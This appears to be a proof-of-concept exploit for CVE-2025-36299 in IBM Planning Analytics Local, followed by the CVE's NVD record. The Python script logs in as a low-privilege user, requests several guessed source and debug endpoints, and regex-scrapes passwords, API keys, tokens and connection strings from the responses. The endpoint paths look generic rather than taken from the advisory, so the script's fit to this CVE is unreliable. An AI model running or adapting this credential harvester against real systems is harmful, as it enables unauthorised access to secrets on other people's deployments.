CVE-2025-36299

# CVE-2025-36299 PoC - IBM Planning Analytics Local Sensitive Info Disclosure # This PoC demonstrates accessing source code with hardcoded sensitive information import requests import re TARGET = "http://target:port" # Target IBM Planning Analytics Local instance USERNAME = "low_privilege_user" PASSWORD = "user_password" def exploit_cve_2025_36299(): """ Exploit for CVE-2025-36299: Sensitive information stored in source code """ # Step 1: Authenticate with low privilege account session = requests.Session() login_url = f"{TARGET}/api/login" auth_data = {"username": USERNAME, "password": PASSWORD} try: response = session.post(login_url, json=auth_data, timeout=30) if response.status_code != 200: print("[-] Authentication failed") return None print("[+] Authentication successful") # Step 2: Enumerate accessible source files paths_to_check = [ "/api/source/config.js", "/static/js/app.bundle.js", "/api/settings/source", "/api/debug/config" ] sensitive_patterns = [ r'password[\s]*[:=][\s]*["\']([^"\']+)["\']', r'api[_-]?key[\s]*[:=][\s]*["\']([^"\']+)["\']', r'secret[\s]*[:=][\s]*["\']([^"\']+)["\']', r'token[\s]*[:=][\s]*["\']([^"\']+)["\']', r'connection[\s]*string[\s]*[:=][\s]*["\']([^"\']+)["\']' ] found_credentials = [] for path in paths_to_check: try: resp = session.get(f"{TARGET}{path}", timeout=30) if resp.status_code == 200: content = resp.text for pattern in sensitive_patterns: matches = re.findall(pattern, content, re.IGNORECASE) if matches: found_credentials.extend(matches) print(f"[+] Found sensitive data in {path}: {matches}") except Exception as e: continue if found_credentials: print(f"\n[!] Successfully extracted {len(found_credentials)} sensitive items") return found_credentials else: print("[-] No sensitive information found in accessible sources") return None except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": print("CVE-2025-36299 PoC - IBM Planning Analytics Local") print("=" * 50) exploit_cve_2025_36299()

{"cve": {"id": "CVE-2025-36299", "sourceIdentifier": "[email protected]", "published": "2025-11-17T20:15:51.280", "lastModified": "2025-11-19T13:08:37.603", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Planning Analytics Local 2.1.0 through 2.1.14 stores sensitive information in source code could be used in further attacks against the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-540"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:planning_analytics_local:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.1.0", "versionEndExcluding": "2.1.15", "matchCriteriaId": "E47A024C-E323-42C2-AECE-A22FC40E4F24"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:planning_analytics_workspace:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.1.0", "versionEndExcluding": "2.1.15", "matchCriteriaId": "66FACACB-88F0-471E-A582-30FED23C668B"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7251265", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}